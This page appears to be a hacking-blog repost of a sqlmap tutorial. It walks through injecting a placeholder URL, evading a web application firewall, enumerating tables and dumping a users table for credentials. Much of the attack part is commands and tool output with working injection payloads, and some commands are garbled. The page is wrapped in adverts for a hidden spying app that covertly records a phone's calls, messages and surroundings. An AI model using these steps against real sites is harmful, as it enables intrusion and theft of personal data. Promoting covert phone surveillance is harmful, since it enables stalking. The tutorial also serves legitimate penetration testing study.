The Most Powerful Hidden Spying App to Monitor Android , IOS Cell Phone & Tablet Device Remotely.
Best Android Parental Control App for Kids & Teens Online Safety.

Now take the liberty to monitor Android , IOS devices with exclusive features better than ever before

Monitor all Voice & Text Messages Communication
Record, Listen & Watch Surroundings in Real-time
Unleash Digital Parenting with Android , IOS Spy App
Spy360 (Surround Listing & Front/Back Camera Bugging)
IM’s VoIP call recording on Android OS 10 & above
With 250+ Surveillance Tools at your fingertips using Android Tracking & Parental Monitoring Software.

blank
HackHackerskali linuxweb hacking

SQLmap Tutorial Introduction Kali Linux – Mac

Running sqlmap yourself is not difficult.
This tutorial will take you from noob to ninja with this powerful sql injection testing tool.

Sqlmap is a python based tool, which means it will usually run on any system with python. However, we like Linux and specifically Ubuntu, it simply makes it easy to get stuff done. Python comes already installed in Ubuntu. This is the same tool we use on our online sql injection test site.

SQLmap Tutorial Introduction Kali Linux - Mac

To get started with sqlmap, it is a matter of downloading the tool, unpacking it, and running the command with the necessary options. As there may be Windows users amongst you, I’ll first start with how to get an Ubuntu install up and running. It is easy to get started on an Ubuntu Linux system, even if the thought of Linux sends shivering spasms of fear. Who knows, you may even like it.Contents:
– SQL Injection Web Hacking with Kali Linux

Install SQLmap

Step 1: Get a Linux based Operating System

If you are going to run SQLmap on Windows with Python, make sure you have Python installed, and skip down to the next step.

Otherwise, get your Linux system fired up.

Either install a Linux virtual machine

(Ubuntu or Kali recommended) on Windows

(Virtualbox / VMware / Parrallels) or boot up your Linux desktop.

If you run Microsoft Windows as your main operating system, it is convenient and simple to run an install of Ubuntu Linux (or Kali Linux) in a virtual machine.

You can then play with sqlmap, nmap, nikto and openvas along with a

hundred other powerful open source security tools.

Step 2: SQLmap Installation

Python is pre-installed in Ubuntu, so all you need to do is clone the latest

repository from git and start your testing.

[email protected]:~$ git clone --depth 1  github .com/sqlmapproject/sqlmap.git sqlmap-dev
Cloning into 'sqlmap-dev'...
remote: Counting objects: 633, done.
remote: Compressing objects: 100% (602/602), done.
remote: Total 633 (delta 170), reused 171 (delta 20), pack-reused 0
Receiving objects: 100% (633/633), 7.17 MiB | 2.44 MiB/s, done.
Resolving deltas: 100% (170/170), done.

Change into the directory and run the python script to ensure all looks good.

[email protected]:~$ cd sqlmap-dev
[email protected]:~/sqlmap-dev$ python sqlmap.py


       __H__
 ___ ___[']_____ ___ ___  {1.3.10.41#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|    sqlmap .org


Usage: python sqlmap.py [options]

sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help

If you do not see something like the output above, make sure python is working (try python -V) to check the version and you are in the right location. Now lets move on this was the easy part.

To get a full list of the options available run python sqlmap.py -h.

Running SQLmap

Simple HTTP GET based test

In this simple test we will use a standard HTTP GET based request against a URI with a parameter (?id=5). This will test different SQL injection methods against the id parameter.

python sqlmap.py -u 'SIte: page.php?id=5'

In the results we can see the different methods used against the parameter.

 

       ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.10.41#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:55:56

[12:55:56] [INFO] testing connection to the target URL
[12:55:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:55:58] [INFO] testing if the target URL content is stable
[12:55:58] [INFO] target URL content is stable
[12:55:58] [INFO] testing if GET parameter 'id' is dynamic
[12:55:58] [INFO] confirming that GET parameter 'id' is dynamic
[12:55:59] [INFO] GET parameter 'id' is dynamic
[12:55:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:56:00] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:56:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:56:18] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="hac")
[12:56:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:56:20] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:56:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:56:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:56:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:56:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:56:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:56:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:56:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:56:24] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:56:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:56:25] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:56:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:56:26] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:56:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:56:27] [INFO] testing 'MySQL inline queries'
[12:56:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:56:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[12:56:41] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[12:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:56:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:56:41] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:56:43] [INFO] target URL appears to have 3 columns in query
[12:56:46] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9561=9561

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:56:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[12:56:52] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite'

[*] shutting down at 12:56:52

Getting blocked by the Web Application Firewall – WAF

Try using a different user agent then the default sqlmap with the --randomagent parameter. 

[email protected]:~/sqlmap-dev$ python sqlmap.py -u " SIte: page.php?id=5" --random-agent
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.10.41#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|    sqlmap .org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:14:04 /2019-11-01/

Retrieve the Database Tables

SQLmap can be used to test and exploit SQL Injection, doing things such as

extracting data from databases, updating tables, and even

 popping shells on remote hosts if all the ducks are in line.

Let’s retrieve the tables from the database using the SQL Injection vulnerability we confirmed above. As you will see in the output below, we can continue testing against the target without having to retest the vulnerability.

SQLmap uses information it knows about the site to further exploit the target database.

To retrieve data we simply add a parameter to the previous command. By adding --tables we can attempt to retrieve all the tables. 

[email protected]:~/sqlmap-dev$ python sqlmap.py -u 'SIte: page.php?id=5' --tables

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.10.41#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|     sqlmap .org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:04

[12:59:04] [INFO] resuming back-end DBMS 'mysql'
[12:59:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9561=9561

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ud=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:59:05] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12

Database: books
[8 tables]
+---------------------------------------+
| author                                |
| shoppingcarts                         |
| categories                            |
| featured                              |
| guestbook                             |
| pictures                              |
| products                              |
| users                                 |
+---------------------------------------+

Database: information_schema
[28 tables] == snipped ==
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

[12:59:21] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/SIte:'

[*] shutting down at 12:59:21

Dump the data

To get data we simply extend our command. Adding -T users will focus in on the users table where we might be able to get some credentials. Adding --dump will tell SQLmap to grab all the data from the users table, first the columns will be enumerated and then the data will be dumped from the columns.

[email protected]:~/sqlmap-dev$ python sqlmap.py -u 'SIte: /page.php?id=5' --tables

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.10.41#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|    sqlmap .org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:04

[12:59:04] [INFO] resuming back-end DBMS 'mysql'
[12:59:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
--- SNIP -----
Database: users
Table: users
[1 entry]
+----------+----------------------------------+------+-------+---------+------------------------+-----------------+
| name     | cart                             | pass | user | phone    | email                  | address         |
----------+-----------------------------------+------+-------+---------+------------------------+-----------------+
| Elliot   | 55207107sfefsff8e7f2fa5ef4fa00f6 | test | test  | 4563454 | [email protected] testtest .com      |                 |
+----------+----------------------------------+------+-------+---------+------------------------+-----------------+

[13:08:36] [INFO] table 'users' dumped to CSV file '/home/fred/.sqlmap/output/mytestsite/dump/books/users.csv'
[13:08:36] [INFO] fetched data logged to text files under '/home/fred/.sqlmap/output/mytestsite'

[*] shutting down at 13:08:36

SQLmap Tips – Go ninja on your SQL Injection Testing

Verbose output

When testing for SQL Injection, it is often necessary to dig into the requests

manually to determine problems with the test or to confirm or even further exploit a discovered injection.

Being able to increase the verbosity of your SQLmap output will help with this testing.

By increasing the verbosity to 4 you can get the HTTP requests, with 5 you

also see the HTTP response headers and 6 will show the full HTTP response.

Obviously, this can get super noisy but sometimes you need to see what is happening.

Got Database Credentials?

This handy tip allows you to connect to the database directly and dump data such as users, databases or tables.

The nice thing about this is you don’t have to remember the SQL syntax for the database or have a client installed. SQLmap will do the heavy lifting acting as a Database Client to dump data.

DB Connection strings:

MySQL, Oracle, Microsoft SQL Server, PostgreSQL
DBMS://USER:[email protected]_IP:DBMS_PORT/DATABASE_NAME
SQLite, Microsoft Access
DBMS://DATABASE_FILEPATH

Popping Shells and More

SQLmap has a ridiculous number of options, and is an amazing tool for becoming one with a database.

Apart from popping shells on the target host, you can send requests through

tor, find injections in page responses automatically, spider sites and, of

course, perform HTTP POST based testing.

These examples merely scratch the surface. Find more examples on the excellent github wiki page.

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

The sqlmap project is currently searching for sponsor(s)

Features

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB and FrontBase database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user’s choice.
  • The user can also choose to dump only a range of characters from each column’s entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables.
  • This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystemcommand.

Refer to the wiki for an exhaustive breakdown of the features.

Download

You can download the latest zipball or tarball.

Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1  github .com/sqlmapproject/sqlmap.git sqlmap-dev

Documentation

  • sqlmap User’s manual.
  • sqlmap History.
  • sqlmap Frequently Asked Questions (FAQ).
  • Material around sqlmap presented at conferences.

Demo

blank

Watch more demos here.

Contribute

All code contributions are greatly appreciated. First off, clone the Git repository, read the user’s manualcarefully, go through the code yourself and drop us an email if you are having a hard time grasping its structure and meaning.

Bug reports are welcome! Please report all bugs on the issue tracker. Our preferred method of patch submission is via a Git pull request.

Each patch should make one logical change.

Please follow the existing stylistic conventions: wrap code to 76 columns when possible.

Avoid tabs, use four space characters instead.

Before you put time into a non-trivial patch, it is worth discussing it privately by email.

Many people have contributed in different ways to the sqlmap development. You can be the next!

Donate

sqlmap is the result of numerous hours of passionated work from a small team of computer security enthusiasts. If you appreciated our work and you want to see sqlmap kept being developed, please consider making a donation to our efforts via PayPal to . We also accept Ƀitcoins to 1AUrrKYsamBEThdruYTQmUfMfLF7aaxU6x.

License

Copyright © 2006-2020 by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar. All rights reserved.

This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation;

Version 2 (or later) with the clarifications and exceptions described in the license file.

This guarantees your right to use, modify, and redistribute this software under certain conditions. If you wish to embed sqlmap technology into proprietary software, we sell alternative licenses (contact ).

Disclaimer

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;

without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License v2.0 for more details at  gnu .org/licenses/gpl-2.0.html.

Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

The Most Powerful Hidden Spying App to Monitor Android , IOS Cell Phone & Tablet Device Remotely.
Best Android Parental Control App for Kids & Teens Online Safety.

Now take the liberty to monitor Android , IOS devices with exclusive features better than ever before

Monitor all Voice & Text Messages Communication
Record, Listen & Watch Surroundings in Real-time
Unleash Digital Parenting with Android , IOS Spy App
Spy360 (Surround Listing & Front/Back Camera Bugging)
IM’s VoIP call recording on Android OS 10 & above
With 250+ Surveillance Tools at your fingertips using Android Tracking & Parental Monitoring Software.

blank

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button